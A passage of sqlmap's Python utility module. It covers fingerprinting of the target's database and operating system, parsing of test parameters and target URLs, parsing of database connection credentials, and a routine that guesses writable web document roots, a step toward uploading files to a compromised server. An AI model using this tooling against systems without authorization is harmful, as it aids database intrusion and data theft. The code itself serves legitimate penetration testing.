if len(kb.htmlFp) == 0 or kb.heuristicTest != HEURISTIC_TEST.POSITIVE:
pass
elif len(kb.htmlFp) == 1:
htmlParsed = kb.htmlFp[0]
elif len(kb.htmlFp) > 1:
htmlParsed = " or ".join(kb.htmlFp)
return htmlParsed
@staticmethod
def getOs(target, info):
"""
Formats the back-end operating system fingerprint value
and return its values formatted as a human readable string.
Example of info (kb.headersFp) dictionary:
{
'distrib': set(['Ubuntu']),
'type': set(['Linux']),
'technology': set(['PHP 5.2.6', 'Apache 2.2.9']),
'release': set(['8.10'])
}
Example of info (kb.bannerFp) dictionary:
{
'sp': set(['Service Pack 4']),
'dbmsVersion': '8.00.194',
'dbmsServicePack': '0',
'distrib': set(['2000']),
'dbmsRelease': '2000',
'type': set(['Windows'])
}
@return: detected back-end operating system based upon fingerprint
techniques.
@rtype: C{str}
"""
infoStr = ""
infoApi = {}
if info and "type" in info:
if hasattr(conf, "api"):
infoApi["%s operating system" % target] = info
else:
infoStr += "%s operating system: %s" % (target, Format.humanize(info["type"]))
if "distrib" in info:
infoStr += " %s" % Format.humanize(info["distrib"])
if "release" in info:
infoStr += " %s" % Format.humanize(info["release"])
if "sp" in info:
infoStr += " %s" % Format.humanize(info["sp"])
if "codename" in info:
infoStr += " (%s)" % Format.humanize(info["codename"])
if "technology" in info:
if hasattr(conf, "api"):
infoApi["web application technology"] = Format.humanize(info["technology"], ", ")
else:
infoStr += "\nweb application technology: %s" % Format.humanize(info["technology"], ", ")
if hasattr(conf, "api"):
return infoApi
else:
return infoStr.lstrip()
class Backend:
# Set methods
@staticmethod
def setDbms(dbms):
dbms = aliasToDbmsEnum(dbms)
if dbms is None:
return None
# Little precaution, in theory this condition should always be false
elif kb.dbms is not None and kb.dbms != dbms:
warnMsg = "there seems to be a high probability that "
warnMsg += "this could be a false positive case"
logger.warn(warnMsg)
msg = "sqlmap previously fingerprinted back-end DBMS as "
msg += "%s. However now it has been fingerprinted " % kb.dbms
msg += "as %s. " % dbms
msg += "Please, specify which DBMS should be "
msg += "correct [%s (default)/%s] " % (kb.dbms, dbms)
while True:
_ = readInput(msg, default=kb.dbms)
if aliasToDbmsEnum(_) == kb.dbms:
break
elif aliasToDbmsEnum(_) == dbms:
kb.dbms = aliasToDbmsEnum(_)
break
else:
warnMsg = "invalid value"
logger.warn(warnMsg)
elif kb.dbms is None:
kb.dbms = aliasToDbmsEnum(dbms)
return kb.dbms
@staticmethod
def setVersion(version):
if isinstance(version, basestring):
kb.dbmsVersion = [version]
return kb.dbmsVersion
@staticmethod
def setVersionList(versionsList):
if isinstance(versionsList, list):
kb.dbmsVersion = versionsList
elif isinstance(versionsList, basestring):
Backend.setVersion(versionsList)
else:
logger.error("invalid format of versionsList")
@staticmethod
def forceDbms(dbms, sticky=False):
if not kb.stickyDBMS:
kb.forcedDbms = aliasToDbmsEnum(dbms)
kb.stickyDBMS = sticky
@staticmethod
def flushForcedDbms(force=False):
if not kb.stickyDBMS or force:
kb.forcedDbms = None
kb.stickyDBMS = False
@staticmethod
def setOs(os):
if os is None:
return None
# Little precaution, in theory this condition should always be false
elif kb.os is not None and isinstance(os, basestring) and kb.os.lower() != os.lower():
msg = "sqlmap previously fingerprinted back-end DBMS "
msg += "operating system %s. However now it has " % kb.os
msg += "been fingerprinted to be %s. " % os
msg += "Please, specify which OS is "
msg += "correct [%s (default)/%s] " % (kb.os, os)
while True:
_ = readInput(msg, default=kb.os)
if _ == kb.os:
break
elif _ == os:
kb.os = _.capitalize()
break
else:
warnMsg = "invalid value"
logger.warn(warnMsg)
elif kb.os is None and isinstance(os, basestring):
kb.os = os.capitalize()
return kb.os
@staticmethod
def setOsVersion(version):
if version is None:
return None
elif kb.osVersion is None and isinstance(version, basestring):
kb.osVersion = version
@staticmethod
def setOsServicePack(sp):
if sp is None:
return None
elif kb.osSP is None and isinstance(sp, int):
kb.osSP = sp
@staticmethod
def setArch():
msg = "what is the back-end database management system architecture?"
msg += "\n[1] 32-bit (default)"
msg += "\n[2] 64-bit"
while True:
_ = readInput(msg, default='1')
if isinstance(_, basestring) and _.isdigit() and int(_) in (1, 2):
kb.arch = 32 if int(_) == 1 else 64
break
else:
warnMsg = "invalid value. Valid values are 1 and 2"
logger.warn(warnMsg)
return kb.arch
# Get methods
@staticmethod
def getForcedDbms():
return aliasToDbmsEnum(kb.get("forcedDbms"))
@staticmethod
def getDbms():
return aliasToDbmsEnum(kb.get("dbms"))
@staticmethod
def getErrorParsedDBMSes():
"""
Returns array with parsed DBMS names till now
This function is called to:
1. Sort the tests, getSortedInjectionTests() - detection phase.
2. Ask user whether or not skip specific DBMS tests in detection phase,
lib/controller/checks.py - detection phase.
3. Sort the fingerprint of the DBMS, lib/controller/handler.py -
fingerprint phase.
"""
return kb.htmlFp if kb.get("heuristicTest") == HEURISTIC_TEST.POSITIVE else []
@staticmethod
def getIdentifiedDbms():
dbms = None
if not kb:
pass
elif Backend.getForcedDbms() is not None:
dbms = Backend.getForcedDbms()
elif Backend.getDbms() is not None:
dbms = kb.dbms
elif conf.get("dbms"):
dbms = conf.dbms
elif Backend.getErrorParsedDBMSes():
dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
elif kb.get("injection") and kb.injection.dbms:
dbms = unArrayizeValue(kb.injection.dbms)
return aliasToDbmsEnum(dbms)
@staticmethod
def getVersion():
if len(kb.dbmsVersion) > 0:
return kb.dbmsVersion[0]
else:
return None
@staticmethod
def getVersionList():
if len(kb.dbmsVersion) > 0:
return kb.dbmsVersion
else:
return None
@staticmethod
def getOs():
return kb.os
@staticmethod
def getOsVersion():
return kb.osVersion
@staticmethod
def getOsServicePack():
return kb.osSP
@staticmethod
def getArch():
if kb.arch is None:
Backend.setArch()
return kb.arch
# Comparison methods
@staticmethod
def isDbms(dbms):
if Backend.getDbms() is not None:
return Backend.getDbms() == aliasToDbmsEnum(dbms)
else:
return Backend.getIdentifiedDbms() == aliasToDbmsEnum(dbms)
@staticmethod
def isDbmsWithin(aliases):
return Backend.getDbms() is not None and Backend.getDbms().lower() in aliases
@staticmethod
def isVersion(version):
return Backend.getVersion() is not None and Backend.getVersion() == version
@staticmethod
def isVersionWithin(versionList):
if Backend.getVersionList() is None:
return False
for _ in Backend.getVersionList():
if _ != UNKNOWN_DBMS_VERSION and _ in versionList:
return True
return False
@staticmethod
def isVersionGreaterOrEqualThan(version):
return Backend.getVersion() is not None and str(Backend.getVersion()) >= str(version)
@staticmethod
def isOs(os):
return Backend.getOs() is not None and Backend.getOs().lower() == os.lower()
def paramToDict(place, parameters=None):
"""
Split the parameters into names and values, check if these parameters
are within the testable parameters and return them in a dictionary.
"""
testableParameters = OrderedDict()
if place in conf.parameters and not parameters:
parameters = conf.parameters[place]
parameters = parameters.replace(", ", ",")
parameters = re.sub(r"&(\w{1,4});", r"%s\g<1>%s" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), parameters)
if place == PLACE.COOKIE:
splitParams = parameters.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)
else:
splitParams = parameters.split(conf.paramDel or DEFAULT_GET_POST_DELIMITER)
for element in splitParams:
element = re.sub(r"%s(.+?)%s" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), r"&\g<1>;", element)
parts = element.split("=")
if len(parts) >= 2:
parameter = urldecode(parts[0].replace(" ", ""))
if conf.paramDel and conf.paramDel == '\n':
parts[-1] = parts[-1].rstrip()
condition = not conf.testParameter
condition |= parameter in conf.testParameter
condition |= place == PLACE.COOKIE and len(intersect((PLACE.COOKIE,), conf.testParameter, True)) > 0
if condition:
testableParameters[parameter] = "=".join(parts[1:])
if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken):
_ = urldecode(testableParameters[parameter], convall=True)
if (_.strip(DUMMY_SQL_INJECTION_CHARS) != _\
or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\
and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX):
warnMsg = "it appears that you have provided tainted parameter values "
warnMsg += "('%s') with most probably leftover " % element
warnMsg += "chars/statements from manual SQL injection test(s). "
warnMsg += "Please, always use only valid parameter values "
warnMsg += "so sqlmap could be able to run properly"
logger.warn(warnMsg)
message = "are you sure you want to continue? [y/N] "
test = readInput(message, default="N")
if test[0] not in ("y", "Y"):
raise SqlmapSilentQuitException
elif not _:
warnMsg = "provided value for parameter '%s' is empty. " % parameter
warnMsg += "Please, always use only valid parameter values "
warnMsg += "so sqlmap could be able to run properly"
logger.warn(warnMsg)
if conf.testParameter and not testableParameters:
paramStr = ", ".join(test for test in conf.testParameter)
if len(conf.testParameter) > 1:
warnMsg = "provided parameters '%s' " % paramStr
warnMsg += "are not inside the %s" % place
logger.warn(warnMsg)
else:
parameter = conf.testParameter[0]
if not intersect(USER_AGENT_ALIASES + REFERER_ALIASES + HOST_ALIASES, parameter, True):
debugMsg = "provided parameter '%s' " % paramStr
debugMsg += "is not inside the %s" % place
logger.debug(debugMsg)
elif len(conf.testParameter) != len(testableParameters.keys()):
for parameter in conf.testParameter:
if parameter not in testableParameters:
debugMsg = "provided parameter '%s' " % parameter
debugMsg += "is not inside the %s" % place
logger.debug(debugMsg)
if testableParameters:
for parameter, value in testableParameters.items():
if value and not value.isdigit():
for encoding in ("hex", "base64"):
try:
decoded = value.decode(encoding)
if len(decoded) > MIN_ENCODED_LEN_CHECK and all(_ in string.printable for _ in decoded):
warnMsg = "provided parameter '%s' " % parameter
warnMsg += "seems to be '%s' encoded" % encoding
logger.warn(warnMsg)
break
except:
pass
return testableParameters
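# Editor's illustrative note (not part of sqlmap): paramToDict() splits a raw parameter
# string into testable name/value pairs. The call and output below are an assumption
# based on the splitting logic above, not captured output:
#   >>> paramToDict(PLACE.GET, "id=1&cat=books")
#   OrderedDict([(u'id', '1'), (u'cat', 'books')])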
def getManualDirectories():
directories = None
pagePath = directoryPath(conf.path)
defaultDocRoot = DEFAULT_DOC_ROOTS.get(Backend.getOs(), DEFAULT_DOC_ROOTS[OS.LINUX])
if kb.absFilePaths:
for absFilePath in kb.absFilePaths:
if directories:
break
if directoryPath(absFilePath) == '/':
continue
absFilePath = normalizePath(absFilePath)
windowsDriveLetter = None
if isWindowsDriveLetterPath(absFilePath):
windowsDriveLetter, absFilePath = absFilePath[:2], absFilePath[2:]
absFilePath = ntToPosixSlashes(posixToNtSlashes(absFilePath))
if any("/%s/" % _ in absFilePath for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES):
for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES:
_ = "/%s/" % _
if _ in absFilePath:
directories = "%s%s" % (absFilePath.split(_)[0], _)
break
if pagePath and pagePath in absFilePath:
directories = absFilePath.split(pagePath)[0]
if windowsDriveLetter:
directories = "%s/%s" % (windowsDriveLetter, ntToPosixSlashes(directories))
directories = normalizePath(directories)
if directories:
infoMsg = "retrieved the web server document root: '%s'" % directories
logger.info(infoMsg)
else:
warnMsg = "unable to retrieve automatically the web server "
warnMsg += "document root"
logger.warn(warnMsg)
directories = []
message = "what do you want to use for writable directory?\n"
message += "[1] common location(s) ('%s') (default)\n" % ", ".join(root for root in defaultDocRoot)
message += "[2] custom location(s)\n"
message += "[3] custom directory list file\n"
message += "[4] brute force search"
choice = readInput(message, default="1").strip()
if choice == "2":
message = "please provide a comma separate list of absolute directory paths: "
directories = readInput(message, default="").split(',')
elif choice == "3":
message = "what's the list file location?\n"
listPath = readInput(message, default="")
checkFile(listPath)
directories = getFileItems(listPath)
elif choice == "4":
targets = set([conf.hostname])
_ = conf.hostname.split('.')
if _[0] == "www":
targets.add('.'.join(_[1:]))
targets.add('.'.join(_[1:-1]))
else:
targets.add('.'.join(_[:-1]))
targets = filter(None, targets)
for prefix in BRUTE_DOC_ROOT_PREFIXES.get(Backend.getOs(), DEFAULT_DOC_ROOTS[OS.LINUX]):
if BRUTE_DOC_ROOT_TARGET_MARK in prefix and re.match(IP_ADDRESS_REGEX, conf.hostname):
continue
for suffix in BRUTE_DOC_ROOT_SUFFIXES:
for target in targets:
item = "%s/%s" % (prefix, suffix)
item = item.replace(BRUTE_DOC_ROOT_TARGET_MARK, target).replace("//", '/').rstrip('/')
directories.append(item)
if BRUTE_DOC_ROOT_TARGET_MARK not in prefix:
break
infoMsg = "using generated directory list: %s" % ','.join(directories)
logger.info(infoMsg)
msg = "use any additional custom directories [Enter for None]: "
answer = readInput(msg)
if answer:
directories.extend(answer.split(','))
else:
directories = defaultDocRoot
return directories
def getAutoDirectories():
retVal = set()
if kb.absFilePaths:
infoMsg = "retrieved web server absolute paths: "
infoMsg += "'%s'" % ", ".join(ntToPosixSlashes(path) for path in kb.absFilePaths)
logger.info(infoMsg)
for absFilePath in kb.absFilePaths:
if absFilePath:
directory = directoryPath(absFilePath)
directory = ntToPosixSlashes(directory)
retVal.add(directory)
else:
warnMsg = "unable to automatically parse any web server path"
logger.warn(warnMsg)
_ = extractRegexResult(r"//[^/]+?(?P<result>/.*)/", conf.url) # web directory
if _:
retVal.add(_)
return list(retVal)
def filePathToSafeString(filePath):
"""
Returns a string representation of a given filepath that is safe to use as a single filename
>>> filePathToSafeString('C:/Windows/system32')
'C__Windows_system32'
"""
retVal = filePath.replace("/", "_").replace("\\", "_")
retVal = retVal.replace(" ", "_").replace(":", "_")
return retVal
def singleTimeDebugMessage(message):
singleTimeLogMessage(message, logging.DEBUG)
def singleTimeWarnMessage(message):
singleTimeLogMessage(message, logging.WARN)
def singleTimeLogMessage(message, level=logging.INFO, flag=None):
if flag is None:
flag = hash(message)
if not conf.smokeTest and flag not in kb.singleLogFlags:
kb.singleLogFlags.add(flag)
logger.log(level, message)
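# Editor's illustrative note: singleTimeLogMessage() keys suppression on 'flag' (by default
# the hash of the message), so an identical message is only logged once per run. Sketch of
# the assumed behaviour:
#   singleTimeWarnMessage("connection dropped by the target")   # logged
#   singleTimeWarnMessage("connection dropped by the target")   # suppressed on repeat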
def boldifyMessage(message):
retVal = message
if any(_ in message for _ in BOLD_PATTERNS):
retVal = setColor(message, True)
return retVal
def setColor(message, bold=False):
retVal = message
level = extractRegexResult(r"\[(?P<result>[A-Z ]+)\]", message) or kb.get("stickyLevel")
if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler
if bold:
retVal = colored(message, color=None, on_color=None, attrs=("bold",))
elif level:
level = getattr(logging, level, None) if isinstance(level, basestring) else level
_ = LOGGER_HANDLER.level_map.get(level)
if _:
background, foreground, bold = _
retVal = colored(message, color=foreground, on_color="on_%s" % background if background else None, attrs=("bold",) if bold else None)
kb.stickyLevel = level if message and message[-1] != "\n" else None
return retVal
def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status=CONTENT_STATUS.IN_PROGRESS):
"""
Writes text to the stdout (console) stream
"""
message = ""
if not kb.get("threadException"):
if forceOutput or not getCurrentThreadData().disableStdOut:
if kb.get("multiThreadMode"):
logging._acquireLock()
if isinstance(data, unicode):
message = stdoutencode(data)
else:
message = data
if hasattr(conf, "api"):
sys.stdout.write(message, status, content_type)
else:
sys.stdout.write(setColor(message, bold))
try:
sys.stdout.flush()
except IOError:
pass
if kb.get("multiThreadMode"):
logging._releaseLock()
kb.prependFlag = isinstance(data, basestring) and (len(data) == 1 and data not in ('\n', '\r') or len(data) > 2 and data[0] == '\r' and data[-1] != '\n')
def dataToTrafficFile(data):
if not conf.trafficFile:
return
try:
conf.trafficFP.write(data)
conf.trafficFP.flush()
except IOError, ex:
errMsg = "something went wrong while trying "
errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, ex)
raise SqlmapGenericException(errMsg)
def dataToDumpFile(dumpFile, data):
dumpFile.write(data)
dumpFile.flush()
def dataToOutFile(filename, data):
retVal = None
if data:
retVal = os.path.join(conf.filePath, filePathToSafeString(filename))
try:
with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
f.write(data)
except IOError, ex:
errMsg = "something went wrong while trying to write "
errMsg += "to the output file ('%s')" % ex
raise SqlmapGenericException(errMsg)
return retVal
def readInput(message, default=None, checkBatch=True):
"""
Reads input from terminal
"""
retVal = None
kb.stickyLevel = None
message = getUnicode(message)
if "\n" in message:
message += "%s> " % ("\n" if message.count("\n") > 1 else "")
elif message[-1] == ']':
message += " "
if kb.prependFlag:
message = "\n%s" % message
kb.prependFlag = False
if conf.get("answers"):
for item in conf.answers.split(','):
question = item.split('=')[0].strip()
answer = item.split('=')[1] if len(item.split('=')) > 1 else None
if answer and question.lower() in message.lower():
retVal = getUnicode(answer, UNICODE_ENCODING)
infoMsg = "%s%s" % (message, retVal)
logger.info(infoMsg)
debugMsg = "used the given answer"
logger.debug(debugMsg)
break
if retVal is None:
if checkBatch and conf.get("batch"):
if isListLike(default):
options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default)
elif default:
options = getUnicode(default, UNICODE_ENCODING)
else:
options = unicode()
dataToStdout("\r%s%s\n" % (message, options), forceOutput=True, bold=True)
debugMsg = "used the default behaviour, running in batch mode"
logger.debug(debugMsg)
retVal = default
else:
logging._acquireLock()
dataToStdout("\r%s" % message, forceOutput=True, bold=True)
kb.prependFlag = False
try:
retVal = raw_input() or default
retVal = getUnicode(retVal, encoding=sys.stdin.encoding) if retVal else retVal
except:
time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893
kb.prependFlag = True
raise SqlmapUserQuitException
finally:
logging._releaseLock()
return retVal
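# Editor's illustrative note: prompts handled by readInput() can be answered automatically
# through conf.answers (command line option '--answers'), a comma-separated list of
# 'question substring=answer' pairs matched case-insensitively against the prompt text,
# e.g. (assumed example) --answers="quit=N,follow=N".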
def randomRange(start=0, stop=1000, seed=None):
"""
Returns random integer value in given range
>>> random.seed(0)
>>> randomRange(1, 500)
423
"""
randint = random.WichmannHill(seed).randint if seed is not None else random.randint
return int(randint(start, stop))
def randomInt(length=4, seed=None):
"""
Returns random integer value with provided number of digits
>>> random.seed(0)
>>> randomInt(6)
874254
"""
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length)))
def randomStr(length=4, lowercase=False, alphabet=None, seed=None):
"""
Returns random string value with provided number of characters
>>> random.seed(0)
>>> randomStr(6)
'RNvnAv'
"""
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
if alphabet:
retVal = "".join(choice(alphabet) for _ in xrange(0, length))
elif lowercase:
retVal = "".join(choice(string.ascii_lowercase) for _ in xrange(0, length))
else:
retVal = "".join(choice(string.ascii_letters) for _ in xrange(0, length))
return retVal
def sanitizeStr(value):
"""
Sanitizes a string value with respect to newline and carriage-return characters
>>> sanitizeStr('foo\\n\\rbar')
u'foo bar'
"""
return getUnicode(value).replace("\n", " ").replace("\r", "")
def checkFile(filename):
"""
Checks for file existence
"""
if filename is None or not os.path.isfile(filename):
raise SqlmapFilePathException("unable to read file '%s'" % filename)
def banner():
"""
This function prints sqlmap banner with its version
"""
_ = BANNER
if not getattr(LOGGER_HANDLER, "is_tty", False):
_ = re.sub("\033.+?m", "", _)
dataToStdout(_, forceOutput=True)
def parsePasswordHash(password):
"""
In case of Microsoft SQL Server password hash value is expanded to its components
"""
blank = " " * 8
if not password or password == " ":
password = NULL
if Backend.isDbms(DBMS.MSSQL) and password != NULL and isHexEncodedString(password):
hexPassword = password
password = "%s\n" % hexPassword
password += "%sheader: %s\n" % (blank, hexPassword[:6])
password += "%ssalt: %s\n" % (blank, hexPassword[6:14])
password += "%smixedcase: %s\n" % (blank, hexPassword[14:54])
if not Backend.isVersionWithin(("2005", "2008")):
password += "%suppercase: %s" % (blank, hexPassword[54:])
return password
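# Editor's illustrative sketch (hash value layout described here is an assumption): a
# Microsoft SQL Server 2000 style hash of the form 0x0100 + 8 hex chars of salt +
# 40 hex chars (mixed-case part) + 40 hex chars (upper-case part) is split by the fixed
# offsets above into header ([:6]), salt ([6:14]), mixedcase ([14:54]) and uppercase ([54:]);
# the upper-case part is omitted for 2005/2008 where it is no longer stored.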
def cleanQuery(query):
"""
Switch all SQL statement (alike) keywords to upper case
"""
retVal = query
for sqlStatements in SQL_STATEMENTS.values():
for sqlStatement in sqlStatements:
sqlStatementEsc = sqlStatement.replace("(", "\\(")
queryMatch = re.search("(%s)" % sqlStatementEsc, query, re.I)
if queryMatch and "sys_exec" not in query:
retVal = retVal.replace(queryMatch.group(1), sqlStatement.upper())
return retVal
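# Editor's illustrative note: only keywords listed in SQL_STATEMENTS are upper-cased,
# identifiers stay untouched. Expected behaviour (assumption based on the regex above):
#   >>> cleanQuery("select id from users")
#   'SELECT id FROM users'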
def setPaths():
"""
Sets absolute paths for project directories and files
"""
# sqlmap paths
paths.SQLMAP_EXTRAS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "extra")
paths.SQLMAP_PROCS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "procs")
paths.SQLMAP_SHELL_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "shell")
paths.SQLMAP_TAMPER_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "tamper")
paths.SQLMAP_WAF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "waf")
paths.SQLMAP_TXT_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "txt")
paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
_ = os.path.join(os.path.expanduser("~"), ".sqlmap")
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
# sqlmap files
paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
paths.COMMON_OUTPUTS = os.path.join(paths.SQLMAP_TXT_PATH, 'common-outputs.txt')
paths.SQL_KEYWORDS = os.path.join(paths.SQLMAP_TXT_PATH, "keywords.txt")
paths.SMALL_DICT = os.path.join(paths.SQLMAP_TXT_PATH, "smalldict.txt")
paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt")
paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
paths.PAYLOADS_XML = os.path.join(paths.SQLMAP_XML_PATH, "payloads.xml")
paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
paths.MSSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "mssql.xml")
paths.MYSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "mysql.xml")
paths.ORACLE_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
for path in paths.values():
if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")):
checkFile(path)
def weAreFrozen():
"""
Returns whether we are frozen via py2exe.
This will affect how we find out where we are located.
Reference: http://www.py2exe.org/index.cgi/WhereAmI
"""
return hasattr(sys, "frozen")
def parseTargetDirect():
"""
Parse target dbms and set some attributes into the configuration singleton.
"""
if not conf.direct:
return
details = None
remote = False
for dbms in SUPPORTED_DBMS:
details = re.search("^(?P<dbms>%s)://(?P<credentials>(?P<user>.+?)\:(?P<pass>.*)\@)?(?P<remote>(?P<hostname>.+?)\:(?P<port>[\d]+)\/)?(?P<db>[\w\d\ \:\.\_\-\/\\\\]+?)$" % dbms, conf.direct, re.I)
if details:
conf.dbms = details.group("dbms")
if details.group('credentials'):
conf.dbmsUser = details.group("user")
conf.dbmsPass = details.group("pass")
else:
if conf.dbmsCred:
conf.dbmsUser, conf.dbmsPass = conf.dbmsCred.split(':')
else:
conf.dbmsUser = unicode()
conf.dbmsPass = unicode()
if not conf.dbmsPass:
conf.dbmsPass = None
if details.group("remote"):
remote = True
conf.hostname = details.group("hostname").strip()
conf.port = int(details.group("port"))
else:
conf.hostname = "localhost"
conf.port = 0
conf.dbmsDb = details.group("db")
conf.parameters[None] = "direct connection"
break
if not details:
errMsg = "invalid target details, valid syntax is for instance "
errMsg += "'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' "
errMsg += "or 'access://DATABASE_FILEPATH'"
raise SqlmapSyntaxException(errMsg)
for dbmsName, data in DBMS_DICT.items():
if conf.dbms in data[0]:
try:
if dbmsName in (DBMS.ACCESS, DBMS.SQLITE, DBMS.FIREBIRD):
if remote:
warnMsg = "direct connection over the network for "
warnMsg += "%s DBMS is not supported" % dbmsName
logger.warn(warnMsg)
conf.hostname = "localhost"
conf.port = 0
elif not remote:
errMsg = "missing remote connection details"
raise SqlmapSyntaxException(errMsg)
if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):
import _mssql
import pymssql
if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2":
errMsg = "'%s' third-party library must be " % data[1]
errMsg += "version >= 1.0.2 to work properly. "
errMsg += "Download from '%s'" % data[2]
raise SqlmapMissingDependence(errMsg)
elif dbmsName == DBMS.MYSQL:
import pymysql
elif dbmsName == DBMS.PGSQL:
import psycopg2
elif dbmsName == DBMS.ORACLE:
import cx_Oracle
elif dbmsName == DBMS.SQLITE:
import sqlite3
elif dbmsName == DBMS.ACCESS:
import pyodbc
elif dbmsName == DBMS.FIREBIRD:
import kinterbasdb
except ImportError:
if _sqlalchemy and data[3] in _sqlalchemy.dialects.__all__:
pass
else:
errMsg = "sqlmap requires '%s' third-party library " % data[1]
errMsg += "in order to directly connect to the database "
errMsg += "%s. You can download it from '%s'" % (dbmsName, data[2])
errMsg += ". Alternative is to use a package 'python-sqlalchemy' "
errMsg += "with support for dialect '%s' installed" % data[3]
raise SqlmapMissingDependence(errMsg)
def parseTargetUrl():
"""
Parse target URL and set some attributes into the configuration singleton.
"""
if not conf.url:
return
originalUrl = conf.url
if re.search("\[.+\]", conf.url) and not socket.has_ipv6:
errMsg = "IPv6 addressing is not supported "
errMsg += "on this platform"
raise SqlmapGenericException(errMsg)
if not re.search("^http[s]*://", conf.url, re.I):
if ":443/" in conf.url:
conf.url = "https://" + conf.url
else:
conf.url = "http://" + conf.url
if CUSTOM_INJECTION_MARK_CHAR in conf.url:
conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
urlSplit = urlparse.urlsplit(conf.url)
hostnamePort = urlSplit.netloc.split(":") if not re.search("\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search("\](:(?P<port>\d+))?", urlSplit.netloc).group("port")))
conf.scheme = urlSplit.scheme.strip().lower() if not conf.forceSSL else "https"
conf.path = urlSplit.path.strip()
conf.hostname = hostnamePort[0].strip()
conf.ipv6 = conf.hostname != conf.hostname.strip("[]")
conf.hostname = conf.hostname.strip("[]").replace(CUSTOM_INJECTION_MARK_CHAR, "")
try:
_ = conf.hostname.encode("idna")
except UnicodeError:
_ = None
if any((_ is None, re.search(r'\s', conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'))):
errMsg = "invalid target URL"
raise SqlmapSyntaxException(errMsg)
if len(hostnamePort) == 2:
try:
conf.port = int(hostnamePort[1])
except:
errMsg = "invalid target URL"
raise SqlmapSyntaxException(errMsg)
elif conf.scheme == "https":
conf.port = 443
else:
conf.port = 80
if urlSplit.query:
conf.parameters[PLACE.GET] = urldecode(urlSplit.query) if urlSplit.query and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in urlSplit.query else urlSplit.query
conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
if not conf.referer and intersect(REFERER_ALIASES, conf.testParameter, True):
debugMsg = "setting the HTTP Referer header to the target URL"
logger.debug(debugMsg)
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders)
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url))
if not conf.host and intersect(HOST_ALIASES, conf.testParameter, True):
debugMsg = "setting the HTTP Host header to the target URL"
logger.debug(debugMsg)
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.HOST, conf.httpHeaders)
conf.httpHeaders.append((HTTP_HEADER.HOST, getHostHeader(conf.url)))
if conf.url != originalUrl:
kb.originalUrls[conf.url] = originalUrl
def expandAsteriskForColumns(expression):
"""
If the user provided an asterisk rather than the column(s)
name, sqlmap will retrieve the columns itself and reprocess
the SQL query string (expression)
"""
asterisk = re.search("^SELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+`?([^`\s()]+)", expression, re.I)
